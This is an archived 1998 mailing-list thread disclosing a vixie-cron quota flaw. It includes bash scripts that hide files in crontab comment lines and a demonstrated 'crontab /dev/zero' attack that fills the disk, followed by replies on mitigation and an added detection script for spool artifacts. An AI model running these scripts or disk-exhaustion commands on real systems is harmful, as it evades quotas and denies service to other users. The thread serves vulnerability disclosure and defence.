[ http://www.rootshell.com/ ]

The problem with vixie cron is wider (and more funny) than I expected.
Here's my proggy which allows hiding files of any kind and size into
crontab entries (remember, quota is ignored ;-):

-- cron_put --
#!/bin/bash
echo "Vixie cron 3.0.1 file storage - put utility"
echo "by Michal Zalewski "
echo

# A file name is required.
if [ "$1" = "" ]; then
  echo usage: $0 file_to_hide
  echo
  exit 0
fi

if [ ! "`ulimit`" = "unlimited" ]; then
  echo Warning, filesize limit is set to `ulimit`.
  echo
fi

echo Installing fake crontab...
echo
echo "* * * * * # whoops..." >vix_tmp
# Prefix every uuencoded line with "#FAKE" so cron treats it as a comment.
uuencode "$1" <"$1" | awk -F "\n" '{print "#FAKE" $1}' >>vix_tmp
crontab vix_tmp

echo "Thank you, file stored successfully."
-- eof --

The next program allows further extraction of these files:

-- cron_get --
#!/bin/bash
echo "Vixie cron 3.0.1 file storage - get utility"
echo "by Michal Zalewski "
echo

if [ ! "`ulimit`" = "unlimited" ]; then
  echo Warning, filesize limit is set to `ulimit`.
  echo
fi

# Strip the "#FAKE" prefix from the stored lines and decode them.
crontab -l | grep "#FAKE" | awk -F "#FAKE" '{print $2}' | uudecode

echo "File restored successfully."
-- eof --

_______________________________________________________________________
Michał Zalewski [lcamtuf@boss.staszic.waw.pl]

----------------------------------------------------------------------------

> The problem with vixie cron is wider (and more funny) than I expected.
> Here's my proggy which allows hiding files of any kind and size into
> crontab entries (remember, quota is ignored ;-):

This is not a vixie-cron specific problem. Comments can be stored in all
cron's I have come across.

grant.

----------------------------------------------------------------------------

On Fri, 6 Feb 1998, Grant Beattie wrote:

| > crontab entries (remember, quota is ignored ;-):
|
| This is not a vixie-cron specific problem. Comments can be stored in all
| cron's I have come across.

the problem is in the _quota_ skipping bug. Just tried it on my dillon's
crond on linux. it aborted with quota exceeded.
---
M S Anam

----------------------------------------------------------------------------

Whoops, I made a mistake in previous post ;P It isn't extremely
important, but may cause misunderstanding. Here's fixed version:

Suid executable, /usr/bin/crontab (vixie-cron up to 3.0.1-20), every time
it is called by user, transfers content of given file to root-owned
temporary file created in /var/spool/cron. Then, when copying is done,
crontab renames it to user's login name. But when copied file is larger
than max. filesize limit (it may be modified using 'ulimit' command) or
available disk space, crontab dies leaving this temporary file. In this
case user may store anything 'behind' quota limits, or waste whole free
disk space. Here's an example:

At the beginning, some useless info ;)

[root@genome /]# rpm -q vixie-cron
vixie-cron-3.0.1-20
[root@genome /]# ls -l /var/spool/cron
total 1
-rw-------   1 root     root          769 Nov 27 20:21 root
[root@genome /]# df
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda3             199079  166164    22634     88%   /
...

Looks good. Now, the main attack:

[lcamtuf@genome lcamtuf]$ ulimit 5000
[lcamtuf@genome lcamtuf]$ quota
Disk quotas for user lcamtuf (uid 513):
     Filesystem  blocks   quota   limit   grace   files   quota   limit   grace
      /dev/hda3       3    5000    5000              15     150     150
...
[lcamtuf@genome lcamtuf]$ NIC=0
[lcamtuf@genome lcamtuf]$ while [ $NIC -lt 5 ]; do crontab /dev/zero & let NIC=NIC+1;done
[1] 399
[2] 400
[3] 401
[4] 402
[5] 403
[lcamtuf@genome lcamtuf]$ sleep 300;killall -9 crontab
[1]   Killed                  crontab /dev/zero
[2]   Killed                  crontab /dev/zero
[3]   Killed                  crontab /dev/zero
[4]   Killed                  crontab /dev/zero
[5]   Killed                  crontab /dev/zero
[lcamtuf@genome lcamtuf]$ quota
Disk quotas for user lcamtuf (uid 513):
     Filesystem  blocks   quota   limit   grace   files   quota   limit   grace
      /dev/hda3       3    5000    5000              13     150     150

Nothing happened...? Not quite:

[root@genome /]# df
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda3             199079  191290        0    100%   /
...

Whoops... What's going on?

[root@genome /]# ls -l /var/spool/cron
total 25106
-rw-------   1 root     root          769 Nov 27 20:21 root
-rw-------   1 root     lcamtuf   5120000 Feb  5 15:01 tmp.453
-rw-------   1 root     lcamtuf   5120000 Feb  5 15:02 tmp.468
-rw-------   1 root     lcamtuf   5120000 Feb  5 15:03 tmp.469
-rw-------   1 root     lcamtuf   5120000 Feb  5 15:03 tmp.482
-rw-------   1 root     lcamtuf   5120000 Feb  5 15:03 tmp.483

Note - when ulimit is 0, user may waste WHOLE DISK SPACE using single
crontab /dev/zero command!!! Not funny, not funny, not funny...

Attack described above is stupid and simple, but /dev/zero may be replaced
eg. with pipe. In this case, these well-hidden 'temporary' files may be
used to store large amounts of hidden data, far away from user's home
directory or tmp dirs.

_______________________________________________________________________
Michał Zalewski [lcamtuf@boss.staszic.waw.pl]

----------------------------------------------------------------------------

On Thu, 5 Feb 1998, Michał Zalewski wrote:

> The problem with vixie cron is wider (and more funny) than I expected.
> Here's my proggy which allows hiding files of any kind and size into
> crontab entries (remember, quota is ignored ;-):

This problem can be easily corrected, at least on Red Hat Linux systems,
where every user has its own group. vixie cron will install the crontab
file with ownership root.usergroup. Installing group quotas for the
partition /var/spool/cron resides on will solve the problem.

I don't know about other linux systems, but at least on Red Hat the
user-group scheme is proving to be useful in this case :-)

Best wishes,

Cristian
--
Cristian Gafton gafton@redhat.com

----------------------------------------------------------------------------
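
Added example, not part of the original posts: a shell audit of a cron spool directory for the two artifacts this thread describes, leftover tmp.* files that crontab never renamed and crontabs carrying a large volume of comment lines. The function names, the 4096-byte threshold and the sample spool are assumptions constructed for illustration.

```shell
#!/bin/sh
# Audit a cron spool directory for the two artifacts described in the thread.
# Assumed for illustration: function names, 4096-byte threshold, sample spool.

# Print leftover temporary files (tmp.*) that crontab never renamed.
find_stale_tmp() {
    for f in "$1"/tmp.*; do
        [ -f "$f" ] && echo "${f##*/}"
    done
    return 0
}

# Print the number of bytes a crontab file holds in comment lines.
comment_bytes() {
    awk '/^[ \t]*#/ { n += length($0) + 1 } END { print n + 0 }' "$1"
}

# Print "name bytes" for each installed crontab whose comments exceed $2 bytes.
flag_crontabs() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        case "${f##*/}" in tmp.*) continue ;; esac
        n=$(comment_bytes "$f")
        [ "$n" -gt "$2" ] && echo "${f##*/} $n"
    done
    return 0
}

# Build a constructed sample spool: one normal crontab, one carrying 100
# "#FAKE" comment lines (66 bytes each), and one leftover temporary file.
make_sample_spool() {
    d=$(mktemp -d) || return 1
    printf '# nightly backup\n0 2 * * * /usr/local/bin/backup\n' > "$d/root"
    {
        echo '* * * * * # whoops...'
        i=0
        while [ "$i" -lt 100 ]; do
            printf '#FAKE%060d\n' 0
            i=$((i + 1))
        done
    } > "$d/alice"
    : > "$d/tmp.453"
    echo "$d"
}

spool=$(make_sample_spool)
echo "stale temporary files:"; find_stale_tmp "$spool"
echo "oversized comment payloads:"; flag_crontabs "$spool" 4096
rm -rf "$spool"
```

On a live system the spool directory shown in the thread is /var/spool/cron, and its files are readable only by root, so the audit has to run as root.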